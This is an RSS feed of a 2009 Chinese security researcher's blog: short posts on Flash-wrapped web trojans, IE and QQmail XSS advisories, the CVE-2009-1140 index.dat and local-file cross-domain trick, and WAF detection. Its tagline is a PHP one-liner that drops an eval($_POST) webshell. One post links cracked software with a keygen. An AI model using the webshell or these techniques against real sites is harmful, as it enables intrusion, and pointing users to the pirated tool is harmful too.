<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[5up3rh3i&#39;blog［提供有偿web代码安全审计服务］]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[&#60; ?fputs(fopen(&#39;heige.php&#39;,&#39;w+&#39;),&#39;&#60; ?php @eval($_POST[c])? &#62;&#39;);? &#62;MSN:SuperHei@ph4nt0m.org]]></description>
<link>http://hi.baidu.com/hi%5Fheige</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[Flash封装的网马]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/376fc606d9caa8c47b89471b.html]]></link>
        <description><![CDATA[
		
		<p>记得去年xgf上知道创宇的小G讲了个关于网马的pp,里面就提到用Flash封装的网马:<a target="_blank" href="http://hi.baidu.com/ycosxhack/blog/item/c28fed54d7d0a35fd0090636.html">http://hi.baidu.com/ycosxhack/blog/item/c28fed54d7d0a35fd0090636.html</a>,现在终于在世面上见到了.[可能那些nb公司的人早就抓到过样本了] 见下图:</p>
<div forimg="1">
<p> </p>
<p> </p>
<div forimg="1"><a target="_blank" href="http://www.80vul.com/flash/flash-1.png"><img class="blogimg" border="0" small="1" src="http://www.80vul.com/flash/flash-1.png"></a></div>
<p>呵呵 直接用的上面那个blog的代码:</p>
<p><font color="#003366">import flash.external.*;<br>
ExternalInterface.call(&quot;eval&quot;,&quot;xxxxxx&quot;);</font></p>
<p><font color="#003366">不过值得说明的是,这个样本还采用了flash的混淆'加密'.一般的flash反编译软件没有用,上面我就是用hp的swfscan出来的代码是混淆后的.网马代码根本看不到... 这样混淆了的flash不知道现在的做挂马扫描或者防御的软件是不是可以搞出来.... :)</font></p>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/376fc606d9caa8c47b89471b.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-11  21:07</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/376fc606d9caa8c47b89471b.html</guid>
</item>

<item>
        <title><![CDATA[地球很危险]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/63b9ee0275c7e881d43f7cb5.html]]></link>
        <description><![CDATA[
		
		给个老头做手术,一不小心被针头刺了一下,下台一看 梅毒血清学阳性........ 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/63b9ee0275c7e881d43f7cb5.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-06  11:22</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/63b9ee0275c7e881d43f7cb5.html</guid>
</item>

<item>
        <title><![CDATA[http-analyzer-full-edition-501[含注册机]]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/7d8043db77c602d2b6fd4838.html]]></link>
        <description><![CDATA[
		
		<p><a href="http://www.fullrapidsharedownload.com/rapidshare-downloads/ieinspector-http-analyzer-full-edition-501">http://www.fullrapidsharedownload.com/rapidshare-downloads/ieinspector-http-analyzer-full-edition-501</a></p>
<p>以前的版本老是对ie8抓不到包.终于找到个新版本的了</p>
<p><font face="宋体-方正超大字符集"><font color="#000000" face="Arial">其实是里面的这个:</font><a target="_blank" href="http://rapidshare.com/files/245233315/IEInspector.HTTP.Analyzer.Full.Edition.v5.0.1.Incl.Keymaker-ZWT.rar">http://rapidshare.com/files/245233315/IEInspector.HTTP.Analyzer.Full.Edition.v5.0.1.Incl.Keymaker-ZWT.rar</a></font></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/7d8043db77c602d2b6fd4838.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-04  22:42</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/7d8043db77c602d2b6fd4838.html</guid>
</item>

<item>
        <title><![CDATA[Multiple Exploiting IE8/IE7 XSS Vulnerability]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/4960aa98f6c85a016f068c7c.html]]></link>
        <description><![CDATA[
		
		<p><a href="http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt">http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt</a></p>
<p>可能很多地方的描叙不是那么准确,大家晓得这个意思就好了~~~~~ :)</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/4960aa98f6c85a016f068c7c.html#comment">查看评论</a>]]></description>
        <pubDate>2009-06-21  16:33</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/4960aa98f6c85a016f068c7c.html</guid>
</item>

<item>
        <title><![CDATA[php的安全补丁风格越来越像adobe]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/065abad20737503d970a1613.html]]></link>
        <description><![CDATA[
		
		<p><a target="_blank" href="http://www.80vul.com/pch/pch-006.txt">[PCH-006]</a> 更新了一下,php的fix很山寨~~~</p>
<p>顺便关系下80vul-B牛人在baiduhi开博:</p>
<p><a href="http://hi.baidu.com/80vul_b">http://hi.baidu.com/80vul_b</a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/065abad20737503d970a1613.html#comment">查看评论</a>]]></description>
        <pubDate>2009-06-19  14:44</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/065abad20737503d970a1613.html</guid>
</item>

<item>
        <title><![CDATA[QQmail Multiple Xss Vulnerabilities]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/76ccc63e9e24abcb7d1e719a.html]]></link>
        <description><![CDATA[
		
		<a href="http://www.80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm">http://www.80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm</a> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/76ccc63e9e24abcb7d1e719a.html#comment">查看评论</a>]]></description>
        <pubDate>2009-06-18  22:06</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/76ccc63e9e24abcb7d1e719a.html</guid>
</item>

<item>
        <title><![CDATA[[zz]SE大牛在Dutch PHP Conference上的pp]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/03886ed84baa0de038012f6d.html]]></link>
        <description><![CDATA[
		
		<p><a href="http://www.suspekt.org/2009/06/16/dutch-php-conference-the-slides/">http://www.suspekt.org/2009/06/16/dutch-php-conference-the-slides/</a></p>
<p>虽然没看到多少新的知识点,但是偶像的东西必须顶 :)</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/03886ed84baa0de038012f6d.html#comment">查看评论</a>]]></description>
        <pubDate>2009-06-17  20:15</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/03886ed84baa0de038012f6d.html</guid>
</item>

<item>
        <title><![CDATA[CVE-2009-1140的8挂]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/d2cf55119faa32f4c2ce7962.html]]></link>
        <description><![CDATA[
		
		<p><a target="_blank" href="http://hi.baidu.com/0x557/blog/item/2f3aead09d096887a0ec9c55.html">大牛8挂nb漏洞</a>,我们只好8挂下委琐流的漏洞了....</p>
<p>----------------------------------------------------------------------------</p>
<p>
<table class="FCK__ShowTableBorders" border="0" cellspacing="0" cellpadding="0">
    <tbody>
        <tr>
            <td style="padding-bottom: 0px; padding-left: 0px; padding-right: 6px; padding-top: 6px"><a href=":Toggle( s3l1-EIMAG )"><img border="0" width="9" height="9" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/minus.gif"></a></td>
            <td class="secLabel"><a style="text-decoration: none" href=":Toggle( s3l1-EIMAG )">
            <h3>跨域信息泄露漏洞 - CVE-2009-1140</h3>
            </a></td>
        </tr>
    </tbody>
</table>
</p>
<div>
<div class="expandoIndent">
<p>在 Internet Explorer 缓存数据的方式中存在一个信息泄露漏洞，可错误地允许调用缓存内容，从而绕过 Internet Explorer 域限制。 如果用户查看网页，攻击者可通过构建一个允许信息泄露的特制网页来利用漏洞。 成功利用此漏洞的攻击者可在另一个域或 Internet Explorer 区域中查看来自本地计算机或另一个浏览器窗口的上下文。</p>
<p>要在&ldquo;常见漏洞和披露&rdquo;列表中以标准条目查看此漏洞，请参阅 <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1140">CVE-2009-1140</a>。</p>
<p>----------------------------------------------------------------------------</p>
<p>分析详见:<a target="_blank" href="http://www.coresecurity.com/content/ie-security-zone-bypass">http://www.coresecurity.com/content/ie-security-zone-bypass</a></p>
<p>对于这个漏洞的8挂,我们可以先看看 <a target="_blank" href="http://blogs.technet.com/secure/default.aspx">大牛蛙的blog</a>上:</p>
<p>----------------------------------------------------------------------------</p>
<p>去年<a target="_blank" mce_href="http://blogs.technet.com/secure/archive/2008/12/23/Acknowledgment-80SEC.aspx" href="http://blogs.technet.com/secure/archive/2008/12/23/Acknowledgment-80SEC.aspx">致谢提到的问题</a>，看似和其中的CVE-2009-1140类似实则不同，故不在此列，依然按计划放在IE的下个较大版本更新时修复</p>
<p>----------------------------------------------------------------------------</p>
<p>不过就我个人看来,应该是同一个问题只是利用方式不一样而已.</p>
<p>CVE-2009-1140 利用的技巧是n年前就出现过的技巧[<a target="_blank" href="http://www.nsfocus.net/vulndb/1062">MS00-055</a>],插入html代码到index.dat,然后用<a href="file://127.0.0.1/c$">file://127.0.0.1\c$</a>的方式调用index.dat来执行这个html代码<br>
80sec-xxxx-xxx 同样是通过//127.0.0.1\c$调用本地文件,然后根据xxxxxxx来判断</p>
<p>所以根本问题是//127.0.0.1\c$跨域调用了本地文件 :) .不过对于ms的fix方式来说可能是&quot;类似实则不同&quot;,换个角度说有可能通过修改判断方式让80sec-xxxx-xxx继续工作???????</p>
<p>[另外:file://127.0.0.1\c$同样是在Internet域,所以不可以调用WScript.Shell直接来执行]</p>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/d2cf55119faa32f4c2ce7962.html#comment">查看评论</a>]]></description>
        <pubDate>2009-06-10  22:17</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/d2cf55119faa32f4c2ce7962.html</guid>
</item>

<item>
        <title><![CDATA[[探索·发现]]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/135fa25094d37110377abe7d.html]]></link>
        <description><![CDATA[
		
		<a href="http://space.tv.cctv.com/page/PAGE1198344259595183">http://space.tv.cctv.com/page/PAGE1198344259595183</a> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/135fa25094d37110377abe7d.html#comment">查看评论</a>]]></description>
        <pubDate>2009-06-09  20:06</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/135fa25094d37110377abe7d.html</guid>
</item>

<item>
        <title><![CDATA[[zz]wafw00f]]></title>
        <link><![CDATA[http://hi.baidu.com/hi%5Fheige/blog/item/c57c1ed647c17bd5a044df55.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<p>这个是appseceu09上一个一个演讲,主要是说杂去探测waf</p>
<p><a href="http://www.owasp.org/images/0/0a/Appseceu09-Web_Application_Firewalls.pdf">http://www.owasp.org/images/0/0a/Appseceu09-Web_Application_Firewalls.pdf</a></p>
<p>wafw00f项目:<a target="_blank" href="http://code.google.com/p/waffit">http://code.google.com/p/waffit/</a></p>
<p>看到这个,想起了几年前我写的一个小脚本:</p>
<p><strong>FiltersScan.pl :<a target="_blank" href="https://www.xfocus.net/bbs/index.php?act=ST&amp;f=2&amp;t=55837">https://www.xfocus.net/bbs/index.php?act=ST&amp;f=2&amp;t=55837</a></strong></p>
<p><strong>对一些采用黑名单方式的ids或者过滤函数还是有一定的效果的:)</strong></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hi%5Fheige/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/hi%5Fheige/blog/item/c57c1ed647c17bd5a044df55.html#comment">查看评论</a>]]></description>
        <pubDate>2009-06-05  21:25</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[hi_heige]]></author>
		<guid>http://hi.baidu.com/hi%5Fheige/blog/item/c57c1ed647c17bd5a044df55.html</guid>
</item>


</channel>
</rss>